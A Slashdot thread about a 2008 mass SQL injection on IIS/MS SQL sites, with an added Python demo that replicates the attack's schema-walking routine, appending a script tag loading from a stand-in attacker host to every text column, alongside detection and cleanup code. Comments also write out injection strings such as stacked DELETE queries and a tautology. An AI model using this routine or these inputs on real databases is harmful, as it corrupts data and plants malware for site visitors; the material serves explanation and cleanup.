
Half a Million Microsoft-Powered Sites Hit With SQL Injection

ScuttleMonkey posted more than 6 years ago | from the little-bobby-tables-strikes-again dept.

Security 222

Titus Germanicus writes to tell us that a recent attack has compromised somewhere in the neighborhood of 500,000 pages with a SQL injection attack. The vulnerability seems to be limited to Microsoft's IIS webserver and is easily defeated by the end user with Firefox and "NoScript." "The automated attack takes advantage of the fact that Microsoft's IIS servers allow generic commands that don't require specific table-level arguments. However, the vulnerability is the result of poor data handling by the sites' creators, rather than a specific Microsoft flaw. In other words, there's no patch that's going to fix the issue; the problem is with the developers who failed to follow well-established security practices for handling database input. The attack itself injects some malicious JavaScript code into every text field in your database, and the JavaScript then loads an external script that can compromise a user's PC." Ignoring corporate spin-doctoring, there seems to be plenty of blame to go around.


Microsoft's Official View of the Situation (4, Insightful)

eldavojohn (898314) | more than 6 years ago | (#23230430)

Ignoring corporate spin-doctoring there seems to be plenty of blame to go around.
Well, here's a quote [informationweek.com] directly from Bill Sisk of Microsoft (seems to be in line with this blogger):

Microsoft (NSDQ: MSFT) on Friday found itself trying to clarify that it has nothing to do with the poor coding practices that have enabled a massive SQL injection attack to affect Web sites using Microsoft IIS Web Server and Microsoft SQL Server. "The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net, or Microsoft SQL technologies," said Bill Sisk, a communications manager at Microsoft, in a blog post. "SQL injection attacks enable malicious users to execute commands in an application's database." Sisk said that to defend against SQL injection attacks, developers should follow secure coding practices.
So if you want Microsoft's side of the story, they can't help it that people use bad coding practices.

As a coder, I don't agree with that. You make a tool/language/framework for developers, you better make it idiot proof. Example: C is far from idiot proof (seg fault!) but it's fast. Stupid fast. Unfortunately for C, there are more stupid coders out there like me than genius coders out there like ... Donald Knuth. So you will see Java rise in popularity without ever being able to live up to the speed of C.

Wow, for flame retardant reasons, take the above paragraph as my meager opinion.

Re:Microsoft's Official View of the Situation (2, Insightful)

duplicate-nickname (87112) | more than 6 years ago | (#23230492)

So, I suppose all of the LAMP sites out there vulnerable to SQL injection are the fault of Microsoft too?

http://www.google.com/search?hl=en&q=site%3Asecurityfocus.com+php+sql+injection [google.com]

Re:Microsoft's Official View of the Situation (0)

MightyMartian (840721) | more than 6 years ago | (#23230786)

No kidding. There are lots of things to blast Microsoft over, but to blast them over a common vulnerability that can be found on virtually every platform out there, and that has everything to do with crappy coding practices and a lack of understanding of why feeding HTML form input straight into a SQL query is so... fucking... bad...

I'd like to challenge the GP as to what particular set of tool alterations he would make to make injection attacks impossible.

Re:Microsoft's Official View of the Situation (4, Informative)

Dekortage (697532) | more than 6 years ago | (#23230928)

Well, to quote from the Hackademix FAQ on this issue [hackademix.net] ... "Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts. There's no Microsoft-specific vulnerability involved: SQL injections can happen (and do happen) on LAMP and other web application stacks as well. SQL injections, and therefore these infections, are caused by poor coding practices during web site development. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site."
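
The "generic" procedure that FAQ quote describes, worked through as an added example. This is not the FAQ's code, any poster's code, or the real payload: Python with the standard sqlite3 module stands in for SQL Server, sqlite_master plus PRAGMA table_info play the role of sys.tables/sys.columns, and the Python loop plays the role of the T-SQL cursor and sp_executesql dynamic SQL that the real attack relied on. The schema, the function names and the script tag are constructed for the demo. The second half is the same catalog walk turned around, to find and strip the tag, which is what an affected site needed that week.

```python
import sqlite3

# Constructed stand-in for the injected <script src=...> tag; the real payload
# pointed at the attackers' hosts, which are not reproduced here.
INJECTED_TAG = '<script src="http://attacker.invalid/x.js"></script>'


def qid(ident: str) -> str:
    """Quote an identifier taken from the catalog so it can only ever name a table/column."""
    return '"' + ident.replace('"', '""') + '"'


def build_sample_db() -> sqlite3.Connection:
    """Constructed toy schema; nothing below depends on knowing it in advance."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL, blurb VARCHAR(200));
        CREATE TABLE news (id INTEGER PRIMARY KEY, title NVARCHAR(80), body TEXT, posted TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.99, 'A fine widget');
        INSERT INTO products VALUES (2, 'Gadget', 19.99, 'A finer gadget');
        INSERT INTO news VALUES (1, 'Hello', 'First post', '2008-04-25');
    """)
    return conn


def text_columns(conn):
    """Walk the catalog and return every (table, column) with a character type.
    sqlite_master + PRAGMA table_info stand in for sys.tables/sys.columns on SQL Server."""
    found = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
    ).fetchall()
    for (table,) in tables:
        for _cid, col, ctype, *_ in conn.execute(f"PRAGMA table_info({qid(table)})"):
            t = (ctype or "").upper()
            if t == "TEXT" or "CHAR" in t:
                found.append((table, col))
    return found


def pollute_all_text_columns(conn, tag=INJECTED_TAG) -> int:
    """The attacker's half: one dynamic UPDATE per text column, appending the tag to
    every value that does not already carry it. No table or column name is hard-coded.
    Returns the number of rows modified."""
    touched = 0
    for table, col in text_columns(conn):
        sql = f"UPDATE {qid(table)} SET {qid(col)} = {qid(col)} || ? WHERE {qid(col)} NOT LIKE ?"
        touched += conn.execute(sql, (tag, "%" + tag + "%")).rowcount
    conn.commit()
    return touched


def find_polluted(conn, marker="<script"):
    """The responder's half: the same catalog walk, SELECT instead of UPDATE.
    Returns (table, column, row_count) for every column carrying the marker."""
    hits = []
    for table, col in text_columns(conn):
        n = conn.execute(
            f"SELECT COUNT(*) FROM {qid(table)} WHERE {qid(col)} LIKE ?", ("%" + marker + "%",)
        ).fetchone()[0]
        if n:
            hits.append((table, col, n))
    return hits


def strip_tag(conn, tag=INJECTED_TAG) -> int:
    """Remove an exactly known tag from every text column. A stop-gap only: the
    attacker had write access, so a pre-incident backup is the trustworthy fix.
    Returns the number of rows modified."""
    n = 0
    for table, col in text_columns(conn):
        sql = (f"UPDATE {qid(table)} SET {qid(col)} = REPLACE({qid(col)}, ?, '') "
               f"WHERE {qid(col)} LIKE ?")
        n += conn.execute(sql, (tag, "%" + tag + "%")).rowcount
    conn.commit()
    return n


if __name__ == "__main__":
    db = build_sample_db()
    print("text columns:", text_columns(db))
    print("rows polluted:", pollute_all_text_columns(db))
    print("hits:", find_polluted(db))
    print("rows cleaned:", strip_tag(db))
```

The point the FAQ is making sits in text_columns(): once the database hands the attacker its own catalog and lets a loop run over it, the same script works against every site, whatever its tables are called. The defender gets the same leverage, which is why a one-off scan like find_polluted() was the first thing to run on a suspect server.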

Re:Microsoft's Official View of the Situation (1)

pembo13 (770295) | more than 6 years ago | (#23230810)

No, they are the fault of Linux obviously. Isn't that the normal assertion?

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23230516)

Flame retardant, eh?
Didn't think of Troll retardant, though!

LINUX GETS HAXXED DAILY BUT IT SUX AND THERE IS NOT 1/2 million Gnu/Linux servers out there because it sucks etc etc...

But really, though. Most smart databases should include some basic SQL injection protection. It's not like it's a new concept. Using the same idea of C vs. Java, they should at least have easier to implement SQL injection protection (input parsing) or limit the amount of commands coming in through the web app to minimize the amount of damage done.

Re:Microsoft's Official View of the Situation (3, Insightful)

techno-vampire (666512) | more than 6 years ago | (#23230518)

You make a tool/language/framework for developers, you better make it idiot proof

Why? It's not their responsibility to see to it that you can't write bad code for their program any more than it's the responsibility of car manufacturers to build cars that can't crash no matter how they're driven. There's only so much MSFT can do to protect lusers against their own stupidity, and if badly trained developers write vulnerable code, it's their own damned fault. I'm no Microsoft fanboi, but even I only bash them when they deserve it.

Re:Microsoft's Official View of the Situation (1)

Nefarious Wheel (628136) | more than 6 years ago | (#23230608)

any more than it's the responsibility of car manufacturers to build cars that can't crash no matter how they're driven

Ref. "Unsafe at any speed" (R.Nader) and contrasting opinion "Safe at any speed" (L.Niven). The latter story was deliberate satire. Flying your car into a Roc can be inconvenient.

Re:Microsoft's Official View of the Situation (2, Interesting)

Cal Paterson (881180) | more than 6 years ago | (#23231256)

Ref. "National Highway Traffic Safety Administration" [wikipedia.org] .

I'm aware this is pretty tangential, but I found it interesting that the Corvair was eventually rated to be a pretty reasonable car by the government body that Nader's book created.

Re:Microsoft's Official View of the Situation (2, Insightful)

0racle (667029) | more than 6 years ago | (#23230528)

Do you post something similar when it's a PHP app on Apache being exploited with a SQL injection and the PHP authors say it's not their fault a whole bunch of their users are idiots?

Microsoft provides a platform, that platform has problems, but in this case the platform had nothing to do with what happened. This rests entirely on web developers who didn't bother to do things correctly.

Re:Microsoft's Official View of the Situation (2, Interesting)

peragrin (659227) | more than 6 years ago | (#23230782)

While I understand that, why is it only MSFT IIS and MS SQL that's affected? If Apache and MS SQL were being attacked (and it has happened) then I could fully understand it, but only MS IIS, MS SQL sites are affected. While the flaw may not be MSFT's sole fault, how could 500,000 people set up a server wrong, including the DHS? Maybe MSFT's history of poor coding and security practices led to unsafe default options? Security should always be over-applied and then removed in layers.

Security, like clothing, works best in layers. You can always add a layer but you can only remove so many. Prepare for an Arctic winter to start with, and you will have everything you need for the beach.

Re:Microsoft's Official View of the Situation (3, Insightful)

dedazo (737510) | more than 6 years ago | (#23230576)

As a coder, I don't agree with that. You make a tool/language/framework for developers

So stock Java protects me from things like "SELECT * FROM users WHERE Name = 'eldavojohn'; DELETE FROM orders", correct?

Wait, it doesn't. Neither does PHP or Python or Perl.

So I guess you can spin it as this somehow being Microsoft's fault, and Slashdot can post it again (and maybe again tomorrow FTW), deliberately confusing pages vs sites and using titillating article titles and editorial bylines about how corporate spin is "bad".

That doesn't change the fact that this is an application vulnerability, much like the endless stream of exploits against applications like phpBB that run on Linux and Apache.

But hey, it's all in the name of freedom and increased ad revenue, right?

Re:Microsoft's Official View of the Situation (3, Informative)

Lobster Quadrille (965591) | more than 6 years ago | (#23230674)

Actually, PHP's mysql engine won't run that query: you cannot execute more than one query in a single mysql_query() call.

There are plenty of ways around it, but your query will fail.

Re:Microsoft's Official View of the Situation (1)

dedazo (737510) | more than 6 years ago | (#23230860)

you cannot execute more than one query in a single mysql_query() call

...is that an actual feature?

Seriously though, does it prevent you from running more than one *statement*, or a query *and* a DDL statement together? I guess that would be impressive.

I use mostly C# and MSSQL, and I routinely write stored procs that return multiple datasets, which wouldn't be a problem in this case, but would PHP prevent me from running an ad hoc statement that returns more than one resultset at a time? As far as I know I can do that with the SqlClient in .NET, but I graduated from the inline SQL happy club about a decade ago so I wouldn't really know.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23230746)

So stock Java protects me from things like "SELECT * FROM users WHERE Name = 'eldavojohn'; DELETE FROM orders", correct?

Wait, it doesn't. Neither does PHP or Python or Perl.
Perl does.* PHP does.* I'd be extremely surprised if Python doesn't.* No idea about Java.

Maybe you should check your facts next time.

* Of course, it's not really meaningful to talk about a language protecting you from SQL injections; it's the database library that decides whether to send SQL to the database or not. I'm talking about the most popular libraries here (e.g. Perl's DBI).

Re:Microsoft's Official View of the Situation (1)

Chokolad (35911) | more than 6 years ago | (#23230856)

> * Of course, it's not really meaningful to talk about a language protecting you from SQL injections; it's the database library that decides whether to send SQL to the database or not. I'm talking about the most popular libraries here (e.g. Perl's DBI).

And this is different from Microsoft offerings how?

Re:Microsoft's Official View of the Situation (1)

mingot (665080) | more than 6 years ago | (#23230988)

Holy shit, you mean if I use taint mode in Perl this can't happen to me? Or mysql_real_escape_string in PHP? Just like if I used parameterized queries in C# I can also be similarly NOT fucked?

Re:Microsoft's Official View of the Situation (1)

lorenzo.boccaccia (1263310) | more than 6 years ago | (#23230934)

Well, actually PHP has a stupid monkey mode where it will escape input strings no matter what.
It's broken, it's restrictive for normal users, and is a bad idea in the same way that forgiving developers for using bad HTML was, but it's there. Never used it, but I know because of some bug that it was introducing in an unrelated application.
php magic quotes [google.it]
Note that I'm NOT asserting that this is a good idea.

Re:Microsoft's Official View of the Situation (2, Funny)

Qzukk (229616) | more than 6 years ago | (#23231128)

It\\'s broken, it\\\\\'s restrictive for normal users, and is a bad idea in the same way that forgiving developer for using bad html was, but it\'s there. never used it, but I know because of some bug that it was introducing in an unrelated application.
Magic quotes is the absolute coolest thing since sliced arrays, or my name isn\\'t Jeffery O\\\\\\\\\\\\\\\\'Donnel!

Re:Microsoft's Official View of the Situation (4, Interesting)

Sancho (17056) | more than 6 years ago | (#23231084)

As others have posted, it's pretty easy to prevent multiple instruction SQL injection. That's a function of the database driver, which Microsoft controls.

It's much harder to prevent injection of additional parameters e.g. typing ' or '1'='1 into the text box--that's something that will be language and developer dependent. From my very brief scan of the details of this vulnerability, it looks like it would have been prevented if Microsoft had disallowed multiple statements in the driver.

This page supports my interpretation. [hackademix.net] I note, specifically:

Attackers carefully weighed the easiest spot, being a combination of

        * ASP classic, due to the poor coding standards among the average VBScripters who hardly know about prepared statements (even though they are supported)
        * ADO as the DB client layer, allowing stacked queries (multiple SQL statements together in a single string), which are not supported, for instance, by JDBC or by the mysql_query() PHP API
        * Microsoft SQL Server, because its Transact SQL supports a rich feature set including loops, metadata enumeration and Dynamic SQL (crucial for generalization), and because it's the most common ASP database back-end with such high-end features.
Apparently, if stacked queries weren't allowed, this wouldn't be nearly so easy to exploit.

Re:Microsoft's Official View of the Situation (2, Insightful)

dedazo (737510) | more than 6 years ago | (#23231440)

it looks like it would have been prevented if Microsoft had disallowed multiple statements in the driver.

So what you are saying is that (and quoting the article you reference) Microsoft is at fault for providing these "high end features"? Even considering that it's not necessary to write sloppy VBScript code, and that it's ridiculously easy to use ADO to put together parameterized database commands, regardless of how many resultsets they are supposed to return?

And that the lack of that feature is actually an advantage for platforms like PHP and Perl? I'm curious, is the lack of that feature the reason for the multiple and well-documented injection attacks against LAMP applications? Or is it something else?

You will forgive me here if I imagine for a second what the general sentiment would be if the PHP MySQL driver actually provided this useful time- and bandwidth-saving feature while ADO/ADO.NET didn't. You would be telling me that it's the developers' fault, since all they need to do is write half-decent code that uses simple and well-documented features in the DB framework that prevent exposure to injection attacks. The PHP folks would not be to blame, and in fact it would be so cool of them to out-innovate Microsoft.

Re:Microsoft's Official View of the Situation (1)

bit trollent (824666) | more than 6 years ago | (#23230750)

C# allows for SQL parameters, which render sql injection all but impossible in most cases. It doesn't require that you use them, but makes them painfully easy to use.

By the way I have been forced to use a C# framework that was so jacked up that I ended up with no choice but to allow sql injection vulnerabilities. I got around this by making sure that every time I had to do that I would make sure that the input came from server side code which read an "int" and then converted it to a string to build the sql injection vulnerable command.

Par for the course, this framework was forced down my throat by someone with more seniority but far less common sense and skill.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23231096)

Since I have written, oh, say 2000 web-enabled forms in the last 10 years in ASP, PHP, ASP.Net, JSP and ColdFusion, I can simply say that yes, you can SQL inject all of them.

And yes, C# has parameters, but so does ASP if you use ADOVBS. There really is no excuse for not escaping inputs; seriously, form validation should always be done regardless. You might as well blame browser makers for allowing people to put semicolons into text boxes at all.

Re:Microsoft's Official View of the Situation (3, Insightful)

Sigma 7 (266129) | more than 6 years ago | (#23230752)

As a coder, I don't agree with that. You make a tool/language/framework for developers, you better make it idiot proof. Example: C is far from idiot proof (seg fault!) but it's fast.
A seg fault is a form of idiot proofing - it prevents rogue C-style pointers from ruining the system. The absence of seg fault means your program is overwriting various locations in memory, which potentially causes the system to crash.

If you need access to locations of memory normally protected by a seg-fault, your operating system normally provides a means to do so.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23230924)

So if you want Microsoft's side of the story, they can't help it that people use bad coding practices.

As a coder, I don't agree with that. You make a tool/language/framework for developers, you better make it idiot proof.
What are you, stupid? It is not Microsoft's, or anyone else's, fault that there are bad programmers in the world. It is not the fault of a language if someone using that language doesn't know what they are doing. People who describe themselves as "coders" might fall into the category of programmers who don't know what they're doing. I don't just write code, I design and develop applications. Much of what I do is research. I take it upon myself to learn about the security implications of what I'm doing and how to protect my applications. A SQL injection attack is just about the most widely-spread vulnerability online, and it's due in large part to a lot of the people like you see on any web development forum like the one attached to w3schools.com just copying and pasting PHP code around with no clue as to what anything does or why it does it.

There is absolutely no need or use in this world for an "idiot-proof" programming language. Programmers are expected to be people who are not idiots, at least when it comes to using computers (as opposed to dating). If you need an "idiot-proof" programming language in order to do decent work as a "coder", then save the rest of us programmers a future headache and find something else to do with your time.

Re:Microsoft's Official View of the Situation (0)

Anonymous Coward | more than 6 years ago | (#23231068)

You make a tool/language/framework for developers, you better make it idiot proof.

Hmm.. how about this instead:

If you are an idiot, then don't try to develop applications.

Really, if you are going to criticize the framework because of stupid developers, then you could probably lay blame with most frameworks out there.

Dupe? (5, Informative)

TubeSteak (669689) | more than 6 years ago | (#23230440)

500 Thousand MS Web Servers Hacked
Posted by kdawson on Friday April 25, @11:48AM
from the scream-and-shout dept.
http://it.slashdot.org/it/08/04/25/1358234.shtml [slashdot.org]

Re:Dupe? (4, Interesting)

calebt3 (1098475) | more than 6 years ago | (#23230570)

At least this one is more accurate in saying 500,000 web pages and not servers.

Re:Dupe? (0)

Anonymous Coward | more than 6 years ago | (#23230680)

The article title says "sites", which I think is the same thing. But at least the summary is slightly more accurate

Re:Dupe? (1)

pfleming (683342) | more than 6 years ago | (#23231220)

You mean IIS can handle more than one site?

Re:Dupe? (-1, Flamebait)

Anonymous Coward | more than 6 years ago | (#23230678)

FUCK DUPE FUCK

+25 insightful

Re:Dupe? (1)

Cheapy (809643) | more than 6 years ago | (#23230842)

/. has been quite good about dupes lately.

I think we can let it slide once in a while.

Dupe (1)

iamhigh (1252742) | more than 6 years ago | (#23230460)

Thought you could sneak it by at 5 o'clock, but I caught ya...

http://it.slashdot.org/article.pl?no_d2=1&sid=08/04/25/1358234 [slashdot.org]

Re:Dupe (1)

eneville (745111) | more than 6 years ago | (#23230690)

Nothing gets under your radar.

Just like viruses and worms, Slashdot has its share of dupes. Just like the number of people who posted here to complain that it's a dupe.

Dupe catching on /. has become almost an extreme sport.

Dupe? (0)

Anonymous Coward | more than 6 years ago | (#23230464)

Isn't this a dupe? I remember the same story from a couple of weeks back...?

Wow... (0, Redundant)

ActionDesignStudios (877390) | more than 6 years ago | (#23230466)

I've seen dupes and all on Slashdot, but this an extreme case. I think this was posted last week, and it wasn't even a good article to begin with. Grats?

This is typical for a dupe (2, Informative)

panaceaa (205396) | more than 6 years ago | (#23230748)

Actually, most dupes on Slashdot are a couple days apart like this one. After that they fail to be news and tend not to get reposted.

The extreme cases are actually measured in the years or hours. There's multiple cases of an article being duped 2-3 years later, especially when they're industry studies on how people use technology or occasionally about scientific discoveries. For the latter, it's often that a university announces they've done something and then publishes the results, which results in two very similar though arguably non-duplicative Slashdot articles.

On the other side, sometimes there's big news and an editor decides to get it out fast without reading the current front page. I've seen dupes within the same hour, but more likely they're 2-3 articles apart in the worst cases. This was one of the arguments for introducing the Slashdot subscription model, in fact: Subscribers have early access to upcoming articles and can tell editors that an upcoming article is a dupe. In many cases (but not all) the editor pulls the dupe before it gets pushed to the front page.

How to fix your SQL Injections (0)

Anonymous Coward | more than 6 years ago | (#23230476)

[quote]
Titus Germanicus writes to tell us that a recent attack has compromised somewhere in the neighborhood of 500,000 pages with a SQL injection attack. The vulnerability seems to be limited to Microsoft's IIS webserver and is easily defeated by the end user with Firefox and "NoScript".
[/quote]

Now, that makes sense. If you have an IIS installation, simply install Firefox and NoScript and you fix all your SQL injections!

Everyone's fault (1)

ais523 (1172701) | more than 6 years ago | (#23230478)

"is easily defeated by the end user with Firefox and "NoScript"." Well, that protects the end user from the compromised server, but not the compromised server from the compromising script. This is not really a vulnerability in IIS, but it is a design decision that means the compromising script can exploit vulnerabilities in badly-written webapps more easily, so it's slightly Microsoft's fault. It's mostly the fault of all the developers who don't know or don't care about SQL injection, though. The same sort of attack could work against any make of server (because it exploits vulnerabilities in the code running on that server), but would be less easy to automate. And of course, the final end-user-compromising vulnerability has to target the end user, who ought to be protected against malicious websites, but many of whom won't be...

Shameless Hibernate Plug (4, Informative)

eldavojohn (898314) | more than 6 years ago | (#23230494)

You know, as an incompetent Java developer, I will take the time to explain why none of my web applications suffered from this.

I use Hibernate [hibernate.org] . I use it with Java, although I know it's now available for .NET.

A feature of Hibernate (aside from some efficient connection pooling and resource management like caching) is that you have to actually call a delete method to delete a row. Something like HibernateSession.delete(myObject); would have to be done. And while this might sound annoying or ruin some tools that are used to generate SQL statements, it protects me time and time again. Now, you can use HQL which is a bastardized version of SQL to generate similar things but, again, I think that you can't drop/delete in it (could be wrong, rarely use it).

Try passing part of an SQL string into an object property and then merge/save it into the HibernateSession. Doesn't do the SQL injection stuff the bad guys want it to. Of course, I still use regular expression common utilities to validate the input, but assuming you didn't do that ...

So why don't other people use Hibernate? Am I missing something about it that's bad?

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23230622)

It's not all that bad but it comes with its own set of quirks, such as lazy-loading issues and degraded performance. Note I'm not saying it's all bad but, as with every abstraction layer, it can create its own problems. I've done quite some consulting for projects which ran into troubles for blindly using Hibernate, just as this post shows problems created by blindly using ASP.Net. Hibernate is not a silver bullet.

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23230642)

Because it onerously bloats application size and complexity, severely degrades performance, and fills the SQL logs with garbage?

Re:Shameless Hibernate Plug (1)

gazbo (517111) | more than 6 years ago | (#23230658)

Because not everyone has swallowed the fashionable BS about ORM being the way ahead, and instead are happy with a pure relational model?

Re:Shameless Hibernate Plug (1)

Cyberax (705495) | more than 6 years ago | (#23230834)

I'm sorry. But what is the 'relational model' you're speaking about?

ORM is just another way to work with a database. It doesn't magically transform a relational database into an object database.

Re:Shameless Hibernate Plug (1)

ChadAmberg (460099) | more than 6 years ago | (#23230688)

Another group in my company is using Hibernate and absolutely hates it with a passion, due to all the bugs they have to work around. The lead architect who doesn't code likes it, but the other architects who still code don't, along with most of the programmers.

Re:Shameless Hibernate Plug (3, Insightful)

Cecil (37810) | more than 6 years ago | (#23230710)

I can't speak about Hibernate specifically, but I can tell you what my first concern would be. Database frameworks usually tend to have trouble dealing with complex database designs, and if they can deal with them they are invariably much slower and less efficient than a SQL statement could be.

Some of these complexity and efficiency issues can be resolved by partial denormalization of the database design, but again, that introduces inefficiency.

Basically, the use of a high-level framework like that introduces significantly more difficulty into the already difficult problem of performance optimization. And for most people, performance is a more immediate and obvious problem that needs solving as opposed to security.

Another problem in my opinion is that there are approximately a million and one different database abstraction layers like Hibernate out there. The lack of standardization makes it very difficult for any of them to gain any sort of critical mass of developers and documentation the way SQL has.

LINQ/SQL and ADO.NET ENTITY FRAMEWORK (0)

Anonymous Coward | more than 6 years ago | (#23230962)

Aside from Hibernate ( which is ok ) there is LINQ (for SQL) and the ADO Entity Framework. Both are from MS and both are pretty good. The framework is in CTP and a few features are missing but I've tested the existing feature set under load and found it useful, solid, and the performance ok for not SQL Direct. LINQ is in production.

http://en.wikipedia.org/wiki/Language_integrated_query [wikipedia.org] [see LINQ for SQL down the page]
http://en.wikipedia.org/wiki/ADO.NET_Entity_Framework [wikipedia.org]

I think Hibernate (for Java) is pretty good, easy to use. I found some of the problems a pain (the old compound key thing irked me). But it is surprising how many people don't like it anymore.

Re:Shameless Hibernate Plug (1)

njcoder (657816) | more than 6 years ago | (#23231108)

I agree. Databases are complex for a reason. These tools seem to try and hide this complexity through abstraction. In doing so you lose access to some of the great features of the underlying database, which may be fine if you're using some crippled version of a database, but with more advanced databases you're locking yourself out of some great db features.

Re:Shameless Hibernate Plug (1)

Sancho (17056) | more than 6 years ago | (#23231148)

> Some of these complexity and efficiency issues can be resolved by partial denormalization of the database design, but again, that introduces inefficiency.

Which efficiency does this reduce? Normally, from a database perspective, normalizing increases data integrity at the expense of database efficiency, doesn't it?

Database frameworks can often deal with complex databases for read operations which, in this day and age, tend to be a high percentage of the operations that a database performs. They're probably worth using for read operations, and write operations where good performance isn't a requirement. You can always fall back on raw SQL (with stringently checked values) in order to gain performance where it's needed.

Re:Shameless ORM Bashing (1)

Foofoobar (318279) | more than 6 years ago | (#23230712)

Yeah and ORM loads more data than you will need or use in comparison to a properly formed query moved to a separate db layer which has all the benefits of ORM with none of the bloat.

Re:Shameless ORM Bashing (0)

Anonymous Coward | more than 6 years ago | (#23231408)

Hibernate supports lazy loading, in which case you can specify exactly what it has to load up front, and then if you need more stuff later it will load it then.

There are problems with that approach as well, but it largely eliminates the bloat problem.

As a complete aside, I don't believe Hibernate sanitizes inputs for you, so it's still possible to perform injection attacks on it.

Re:Shameless Hibernate Plug (1)

bottlecaps4u (1280882) | more than 6 years ago | (#23230916)

I'd like to point out that SQL injection attacks are not limited to IIS web servers. Not properly escaping SQL statements in PHP can lead to SQL injection attacks, and the same problem exists in Python, in Perl, and in a multitude of languages. Not properly creating limited-access users aggravates the situation as well.

Using Hibernate helps developers by providing a robust persistence layer. But it is important to note the role of this layer -- the persistence layer is simply an abstraction from the underlying SQL. For many software projects, it is a good idea to have a persistence layer, since having this layer can provide a measure of protection against SQL injection attacks, but at some point in their code, raw SQL needs to be issued to the database.

It seems to me the point of the article is NOT that SQL injection attacks can occur, but rather that MSSQL stored procedures allow automated attack scripts to run.

Re:Shameless Hibernate Plug (1)

Threni (635302) | more than 6 years ago | (#23230974)

> I'd like to point out that SQL injection attacks are not limited to IIS web servers.

Shush! Give the Slashdot anti-MS weirdos their two minutes hate. It helps take their mind off the fact that Microsoft's database products are powerful and easy to use.

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23231012)

So it's better if they didn't allow you to discover the database with SQL? (clearly nobody needs that)
Or is it better if they didn't allow you to submit ad hoc raw queries to SQL?

Up and down this is a luser problem, not a Microsoft one, and it seems everyone with a brain here has already agreed.

Bad code (unescaped / unparameterized parameters)
Bad DBA (permissions set so anything can run on the database)
Bad Webmaster (website talking to SQL with too many permissions)

Just because some people can't hold a gun without shooting themselves in the foot doesn't mean you get to take mine away.

Re:Shameless Hibernate Plug (1)

Tim C (15259) | more than 6 years ago | (#23230976)

Never mind Hibernate (which is great, but like all tools & frameworks only good as far as it goes and hardly faultless), just use PreparedStatements and the setXXX() methods and never worry about SQL injection again. This has been available since JDK 1.2, ferchrisakes.

Seriously, the fact that in 2008 any site created by a "professional" web developer is vulnerable to SQL injection is little short of sickening.

Re:Shameless Hibernate Plug (0)

Anonymous Coward | more than 6 years ago | (#23231106)

You don't even need to use hibernate - just using Java with raw JDBC PreparedStatements (that's a parameterized statement for non-Java folks) protects you fine from injection attacks. I would think most languages have something like this. Who concatenates parameters into SQL strings anymore? Well, I guess at least 500,000 sites do.

Dupe Dance (2, Informative)

jd (1658) | more than 6 years ago | (#23230520)

Yay! We get a re-run of one of the more non-story events of recent times. The problem was spotted very quickly by IIS admins, as was noted before, and it's half a million pages, not half a million sites. Well, unless all sites have one page and I've only been thinking they used hypertext links to more of their own content. It's unclear what percent of those sites were IIS, what were Apache (an easy server to misconfigure), and what were other web servers. Blaming it on IIS is easy, and there probably is some truth to the allegation that IIS has flaws when it comes to SQL support, but this time they almost (I said almost) have justification in crying foul when Microsoft gets blamed.

What I don't get, though, is not only does this dupe the earlier story, it dupes ALL OF THE ERRORS as well. Sheesh!

Had a problem once.. (1)

thewils (463314) | more than 6 years ago | (#23230526)

...with a user wanting to inject images from other websites into my pages.
I solved it quite nicely by translating any opening bracket to "ampersand-gt-;" (you know what I mean) and any urls were totally ignored after that.

It's a well known bug in IIS. (1)

dameron (307970) | more than 6 years ago | (#23230538)

A buffer overflow in the dupcheck module leads to privilege elevation.

You can spot it pretty easily if you reload a backup from 4/25 and your web page keeps spamming out the same offensive links.

How does Apache avoid this? (1)

hellfire (86129) | more than 6 years ago | (#23230574)

I'm not knowledgeable enough to answer this, but I know there has to be a good "in your face, Microsoft" reason why this doesn't hit servers like Apache. They point the finger at the websites and say "UR DOIN IT RONG!" and blame them. And yet Apache users don't have to worry about this. Why? That's the argument I want to have.

Re:How does Apache avoid this? (0)

Anonymous Coward | more than 6 years ago | (#23230644)

Because it's a Microsoft product, and hence must be the root of all evil. Let's disregard how stupid the website developer is for not sanitizing SQL queries and blame MS instead!

Re:How does Apache avoid this? (1)

graveyhead (210996) | more than 6 years ago | (#23230740)

No such "in your face" reason exists. It's not Apache that matters here (or IIS I'm guessing), it's the database and interacting with it via some server side language.

So when someone appends a string to a query directly from a CGI variable (in a URL, after a question mark - those are CGI vars ... blah.cgi?bar=baz) this can be used as an attack vector regardless of the platform. This error is super easy to make in PHP, for example:

mysql_query("SELECT * FROM mytable WHERE foo = " . $_REQUEST['foo']);

What's happening here is that the user value for "foo" is being used as the WHERE clause of a SQL query. Looks nice and innocent, right?

Well, guess what if someone hits your site with this:

blah.cgi?foo=(DELETE FROM MYTABLE)

Result: byebye database.

Fixing this is known as "sanitizing inputs" and there's many ways to do it.

What this IIS thing sounds like to me is some specific application that happens to use IIS / MSSQL does not sanitize. Therefore vulnerable.

Re:How does Apache avoid this? (2, Informative)

Sancho (17056) | more than 6 years ago | (#23231174)

That's close.

http://hackademix.net/2008/04/26/mass-attack-faq/#comment-7742 [hackademix.net] has a decent explanation of why this is primarily hitting IIS. SQL injection is common to many platforms, but Microsoft's database driver has some features that made it particularly easy to generalize the exploit. Specifically, prior knowledge of the table layout was apparently unnecessary to create the exploit, meaning that it was easy to hit a large number of websites in a short period of time.

Re:How does Apache avoid this? (1)

mingot (665080) | more than 6 years ago | (#23230768)

Not really because apache is just as susceptible to this as any other web server.

Re:How does Apache avoid this? (1)

jd (1658) | more than 6 years ago | (#23230772)

